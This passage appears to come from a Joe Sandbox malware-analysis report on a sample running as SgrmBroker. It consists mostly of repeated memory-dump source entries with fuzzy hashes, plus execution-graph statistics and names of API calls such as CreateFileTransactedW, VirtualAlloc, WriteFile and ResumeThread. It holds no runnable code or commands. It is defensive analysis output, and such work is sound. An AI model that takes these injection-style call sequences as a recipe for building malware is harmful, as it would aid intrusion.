                                      • Source File: 0000000B.00000002.2486936710.00007FFD34A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A80000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_7ffd34a80000_SgrmBroker.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 1dfff1ae277fa7f129cb4bfe02e61d1314057370ae1508c8d960baf735c9b64b
                                      • Instruction ID: 2cb37bca0caf0e2327647722237edd1b8cdc48968bf19381fa3765185227380e
                                      • Opcode Fuzzy Hash: 1dfff1ae277fa7f129cb4bfe02e61d1314057370ae1508c8d960baf735c9b64b
                                      • Instruction Fuzzy Hash: 53C1B670A08A6D8FDBE4EF18D8A57E8B7B1FB59305F5001EAD40DE3291DA75A980DF40
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.2486936710.00007FFD34A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A80000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_7ffd34a80000_SgrmBroker.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: bdd6a0b098c9415e4b56af11af249c9fb9eaab8091d8d13c0ab49bfb3c9aff5d
                                      • Instruction ID: 529abacc99ff91dc5f0a4df50f23345ccfe1c7e2b385bec4d527bf4f35b0efaa
                                      • Opcode Fuzzy Hash: bdd6a0b098c9415e4b56af11af249c9fb9eaab8091d8d13c0ab49bfb3c9aff5d
                                      • Instruction Fuzzy Hash: 67A10772E0DA894FEB94DF68D8A46F97FE0FF56314F1400BAD548D7193CA28A805D750
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.2486936710.00007FFD34A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A80000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_7ffd34a80000_SgrmBroker.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 27a138ac6468562cc451175d1ab3ef2c62e11bda36dd7411825cbd48f53e4386
                                      • Instruction ID: daaea86f00302657682fb4b34083920836f4f7648ce4f0417884b940270580be
                                      • Opcode Fuzzy Hash: 27a138ac6468562cc451175d1ab3ef2c62e11bda36dd7411825cbd48f53e4386
                                      • Instruction Fuzzy Hash: 5D81B572A0DA8D8FEB94DF58D8646F97BE1FF5A304F1800BAD458D7297CA38A841C750
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.2486936710.00007FFD34A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A80000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_7ffd34a80000_SgrmBroker.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 3c34afb02253f4150e490f80bdf7381d72379848276fc42f7c45070f9f035bd1
                                      • Instruction ID: 64081eb4601fc10a2bb0b1ca7a0bcc50abe379055447dba6f7d5748fc76b55ef
                                      • Opcode Fuzzy Hash: 3c34afb02253f4150e490f80bdf7381d72379848276fc42f7c45070f9f035bd1
                                      • Instruction Fuzzy Hash: BD61D030A1C68D8FDB95DF68C8A46E97BF0FF1A300F0401BAE448D7192DB78A954CB81
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.2486936710.00007FFD34A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A80000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_7ffd34a80000_SgrmBroker.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: b889c52d80a001d59de201a10629492b42886b95c829e9be81659e65bc80ef46
                                      • Instruction ID: e6b55fcb62412e3a637036c4cf279b515bf36b456457faf669fc1e5c6ae1dcad
                                      • Opcode Fuzzy Hash: b889c52d80a001d59de201a10629492b42886b95c829e9be81659e65bc80ef46
                                      • Instruction Fuzzy Hash: 5A61DD70A08A5D8FDF94DF58C894BE97BB1FFA9311F144266D40DE3255CB34A885CB80
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.2486936710.00007FFD34A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A80000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_7ffd34a80000_SgrmBroker.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: ef8ee4a14c9754e052f858d4b8e31e9138884af00129f6a3549ec5bbac68a26e
                                      • Instruction ID: 08acab5e138a2cb1e4e245c00bed9a5a1d4cde1cc3b8a43447f61eaa9964d6da
                                      • Opcode Fuzzy Hash: ef8ee4a14c9754e052f858d4b8e31e9138884af00129f6a3549ec5bbac68a26e
                                      • Instruction Fuzzy Hash: A6610B70E0961D8FEBA4EB58C8E9AA9B7B1EF55305F1001B9D40DE32A1DF386D859F40
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.2486936710.00007FFD34A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A80000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_7ffd34a80000_SgrmBroker.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: fb840f6545629c1226c50cc2efa3ada5a7a871056e0248278a1b0d7e3eb6bdd9
                                      • Instruction ID: cc861cddc22032e2b59faad517fe10e8883a7b9f9e7a22d3a5645ffb1c6703f8
                                      • Opcode Fuzzy Hash: fb840f6545629c1226c50cc2efa3ada5a7a871056e0248278a1b0d7e3eb6bdd9
                                      • Instruction Fuzzy Hash: 5551A131A0868D8FDBA5DF54C891AF9BBF0FF5A304F5401EAD44DD7182CA38A956CB81
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.2486936710.00007FFD34A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A80000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_7ffd34a80000_SgrmBroker.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: e7aa1ec2f278404ea7f7472f3f26cc391730ad16aa2e1b79b0e4d017b59d1eed
                                      • Instruction ID: 4f1377c84171039e79a7840a36884f2e1493269a0feac770ad65352fe82d70b7
                                      • Opcode Fuzzy Hash: e7aa1ec2f278404ea7f7472f3f26cc391730ad16aa2e1b79b0e4d017b59d1eed
                                      • Instruction Fuzzy Hash: E251B131A1865E8FDB94DF58C8A46FABBF0FF59300F1405BAE418D3192DB78A954CB80
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.2486936710.00007FFD34A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A80000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_7ffd34a80000_SgrmBroker.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 62fcbcc85e1c3c5e3087f5ceacf8634586a1b09f0a53ef827632ce3c7af0337c
                                      • Instruction ID: e479a6dec4d73e660284ea729fa14dc41d1f105980bd26592047dd5428f1d93f
                                      • Opcode Fuzzy Hash: 62fcbcc85e1c3c5e3087f5ceacf8634586a1b09f0a53ef827632ce3c7af0337c
                                      • Instruction Fuzzy Hash: 30517570A55A2D8FEBA4EB58C8D9AA9B7B1FF59301F1001A9D40DE3261DF74AD81CF40
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.2486936710.00007FFD34A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A80000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_7ffd34a80000_SgrmBroker.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: f03f570397dce20a5864fd4c8b26e377f7c57c629aed53d7b914bb2901939612
                                      • Instruction ID: 331bb809e388d5d0f81f193a4eb73e219395a781b03031f370df5d13224a79ea
                                      • Opcode Fuzzy Hash: f03f570397dce20a5864fd4c8b26e377f7c57c629aed53d7b914bb2901939612
                                      • Instruction Fuzzy Hash: 3141B231A1DA5D8FDB81EF58D8A56FD7BF0FF5A310F0401BAD509E3292CA695841C790
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.2486936710.00007FFD34A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A80000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_7ffd34a80000_SgrmBroker.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: b9a8b86084a49321f57ffd6024d49bd62bbf471477a8b87194fb736de751682e
                                      • Instruction ID: f3a50cd82cba2f14c33859ff5099bab692803a023b8727e5d0dbfcf100790d51
                                      • Opcode Fuzzy Hash: b9a8b86084a49321f57ffd6024d49bd62bbf471477a8b87194fb736de751682e
                                      • Instruction Fuzzy Hash: CE519130A1892D8FDBE4EB18C8A5BE8B7B1FB69301F5044E9950DE3251DA74AD80CF40
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.2486936710.00007FFD34A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A80000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_7ffd34a80000_SgrmBroker.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: fef91281c957f7f34b812111ec1b620bc9e0174befd08ea56d4bbde4bc40d30e
                                      • Instruction ID: fbde760bc90eb789c796352e241beed74123c840bfe4beb95b5f8c18927d75c0
                                      • Opcode Fuzzy Hash: fef91281c957f7f34b812111ec1b620bc9e0174befd08ea56d4bbde4bc40d30e
                                      • Instruction Fuzzy Hash: AD416870E5894D8FEB91EBA8D8A56EDBBB1FF4A305F540076D10CE3192CA7869818B01
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.2486936710.00007FFD34A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A80000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_7ffd34a80000_SgrmBroker.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.2486936710.00007FFD34A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A80000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_7ffd34a80000_SgrmBroker.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.2486936710.00007FFD34A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A80000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_7ffd34a80000_SgrmBroker.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:

                                       Execution Graph

                                       Execution Coverage: 14.4%
                                       Dynamic/Decrypted Code Coverage: 100%
                                       Signature Coverage: 0%
                                       Total number of Nodes: 35
                                       Total number of Limit Nodes: 2
                                       (graph figure not reproduced; API calls reached in the graph: CreateFileTransactedW, VirtualAlloc, WriteFile, GetSystemInfo, ResumeThread)

                                       Control-flow Graph (figure not reproduced; executed and not-executed blocks, with a call to CreateFileTransactedW)
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.2766052231.00007FFD348C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348C0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_7ffd348c0000_SgrmBroker.jbxd
                                      Similarity
                                      • API ID: CreateFileTransacted
                                      • String ID:
                                      • API String ID: 2149338676-0

                                       Control-flow Graph (figure not reproduced; executed and not-executed blocks, with a call to CreateFileTransactedW)
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.2766052231.00007FFD348C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348C0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_7ffd348c0000_SgrmBroker.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:

                                       Control-flow Graph (figure not reproduced; executed and not-executed blocks, with a call to WriteFile)
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.2766052231.00007FFD348C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348C0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_7ffd348c0000_SgrmBroker.jbxd
                                      Similarity
                                      • API ID: FileWrite
                                      • String ID:
                                      • API String ID: 3934441357-0

                                       Control-flow Graph (figure not reproduced; executed and not-executed blocks, with a call to GetSystemInfo)
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.2766052231.00007FFD348C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348C0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_7ffd348c0000_SgrmBroker.jbxd
                                      Similarity
                                      • API ID: InfoSystem
                                      • String ID:
                                      • API String ID: 31276548-0

                                       Control-flow Graph (figure not reproduced; executed and not-executed blocks, with a call to ResumeThread)
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.2766052231.00007FFD348C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348C0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_7ffd348c0000_SgrmBroker.jbxd
                                      Similarity
                                      • API ID: ResumeThread
                                      • String ID:
                                      • API String ID: 947044025-0
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.2766052231.00007FFD348C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348C0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_7ffd348c0000_SgrmBroker.jbxd
                                      Similarity
                                      • API ID: InfoSystem
                                      • String ID:
                                      • API String ID: 31276548-0
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.2766052231.00007FFD348C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348C0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_7ffd348c0000_SgrmBroker.jbxd
                                      Similarity
                                      • API ID: AllocVirtual
                                      • String ID:
                                      • API String ID: 4275171209-0
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.2767060526.00007FFD34AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34AA0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_7ffd34aa0000_SgrmBroker.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.2767060526.00007FFD34AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34AA0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_7ffd34aa0000_SgrmBroker.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.2767060526.00007FFD34AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34AA0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_7ffd34aa0000_SgrmBroker.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.2767060526.00007FFD34AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34AA0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_7ffd34aa0000_SgrmBroker.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.2767060526.00007FFD34AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34AA0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_7ffd34aa0000_SgrmBroker.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.2767060526.00007FFD34AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34AA0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_7ffd34aa0000_SgrmBroker.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.2767060526.00007FFD34AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34AA0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_7ffd34aa0000_SgrmBroker.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.2767060526.00007FFD34AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34AA0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_7ffd34aa0000_SgrmBroker.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.2767060526.00007FFD34AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34AA0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_7ffd34aa0000_SgrmBroker.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.2767060526.00007FFD34AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34AA0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_7ffd34aa0000_SgrmBroker.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.2767060526.00007FFD34AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34AA0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_7ffd34aa0000_SgrmBroker.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.2767060526.00007FFD34AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34AA0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_7ffd34aa0000_SgrmBroker.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.2767060526.00007FFD34AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34AA0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_7ffd34aa0000_SgrmBroker.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.2767060526.00007FFD34AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34AA0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_7ffd34aa0000_SgrmBroker.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.2767060526.00007FFD34AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34AA0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_7ffd34aa0000_SgrmBroker.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:

                                       Execution Graph

                                       Execution Coverage: 16.2%
                                       Dynamic/Decrypted Code Coverage: 100%
                                       Signature Coverage: 0%
                                       Total number of Nodes: 32
                                       Total number of Limit Nodes: 2
                                       (graph figure not reproduced; API calls reached in the graph: VirtualAlloc, WriteFile, CreateFileTransactedW, ResumeThread, GetSystemInfo)
                                      Memory Dump Source
                                      • Source File: 00000016.00000002.3082510787.00007FFD34A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A70000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_22_2_7ffd34a70000_SgrmBroker.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:

                                      Control-flow Graph

                                      [Control-flow graph figure (executed vs. not-executed blocks); first basic block at 7ffd3489b98a; API call on the graph: CreateFileTransactedW]
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000016.00000002.3081042849.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_22_2_7ffd34890000_SgrmBroker.jbxd
                                      Similarity
                                      • API ID: CreateFileTransacted
                                      • String ID:
                                      • API String ID: 2149338676-0

                                      Control-flow Graph

                                      [Control-flow graph figure (executed vs. not-executed blocks); first basic block at 7ffd34899fb0; API call on the graph: CreateFileTransactedW]
                                      Memory Dump Source
                                      • Source File: 00000016.00000002.3081042849.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_22_2_7ffd34890000_SgrmBroker.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:

                                      Control-flow Graph

                                      [Control-flow graph figure (executed vs. not-executed blocks); first basic block at 7ffd3489bc35; API call on the graph: WriteFile]
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000016.00000002.3081042849.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_22_2_7ffd34890000_SgrmBroker.jbxd
                                      Similarity
                                      • API ID: FileWrite
                                      • String ID:
                                      • API String ID: 3934441357-0

                                      Control-flow Graph

                                      [Control-flow graph figure (executed vs. not-executed blocks); first basic block at 7ffd3489d59a; API call on the graph: GetSystemInfo]
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000016.00000002.3081042849.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_22_2_7ffd34890000_SgrmBroker.jbxd
                                      Similarity
                                      • API ID: InfoSystem
                                      • String ID:
                                      • API String ID: 31276548-0

                                      Control-flow Graph

                                      [Control-flow graph figure (executed vs. not-executed blocks); first basic block at 7ffd348ff1d7; API call on the graph: ResumeThread]
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000016.00000002.3081042849.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_22_2_7ffd34890000_SgrmBroker.jbxd
                                      Similarity
                                      • API ID: ResumeThread
                                      • String ID:
                                      • API String ID: 947044025-0

                                      Control-flow Graph

                                      [Control-flow graph figure (executed vs. not-executed blocks); first basic block at 7ffd3489d5d1; API call on the graph: GetSystemInfo]
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000016.00000002.3081042849.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_22_2_7ffd34890000_SgrmBroker.jbxd
                                      Similarity
                                      • API ID: InfoSystem
                                      • String ID:
                                      • API String ID: 31276548-0
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000016.00000002.3081042849.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_22_2_7ffd34890000_SgrmBroker.jbxd
                                      Similarity
                                      • API ID: AllocVirtual
                                      • String ID:
                                      • API String ID: 4275171209-0
                                      Memory Dump Source
                                      • Source File: 00000016.00000002.3082510787.00007FFD34A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A70000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_22_2_7ffd34a70000_SgrmBroker.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      Memory Dump Source
                                      • Source File: 00000016.00000002.3082510787.00007FFD34A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A70000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_22_2_7ffd34a70000_SgrmBroker.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      Memory Dump Source
                                      • Source File: 00000016.00000002.3082510787.00007FFD34A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A70000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_22_2_7ffd34a70000_SgrmBroker.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      Memory Dump Source
                                      • Source File: 00000016.00000002.3082510787.00007FFD34A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A70000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_22_2_7ffd34a70000_SgrmBroker.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      Memory Dump Source
                                      • Source File: 00000016.00000002.3082510787.00007FFD34A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A70000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_22_2_7ffd34a70000_SgrmBroker.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      Memory Dump Source
                                      • Source File: 00000016.00000002.3082510787.00007FFD34A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A70000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_22_2_7ffd34a70000_SgrmBroker.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      Memory Dump Source
                                      • Source File: 00000016.00000002.3082510787.00007FFD34A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A70000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_22_2_7ffd34a70000_SgrmBroker.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      Memory Dump Source
                                      • Source File: 00000016.00000002.3082510787.00007FFD34A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A70000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_22_2_7ffd34a70000_SgrmBroker.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      Memory Dump Source
                                      • Source File: 00000016.00000002.3082510787.00007FFD34A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A70000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_22_2_7ffd34a70000_SgrmBroker.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      Memory Dump Source
                                      • Source File: 00000016.00000002.3082510787.00007FFD34A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A70000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_22_2_7ffd34a70000_SgrmBroker.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      Memory Dump Source
                                      • Source File: 00000016.00000002.3082510787.00007FFD34A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A70000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_22_2_7ffd34a70000_SgrmBroker.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      Memory Dump Source
                                      • Source File: 00000016.00000002.3082510787.00007FFD34A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A70000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_22_2_7ffd34a70000_SgrmBroker.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      Memory Dump Source
                                      • Source File: 00000016.00000002.3082510787.00007FFD34A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A70000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_22_2_7ffd34a70000_SgrmBroker.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      Memory Dump Source
                                      • Source File: 00000016.00000002.3082510787.00007FFD34A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A70000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_22_2_7ffd34a70000_SgrmBroker.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
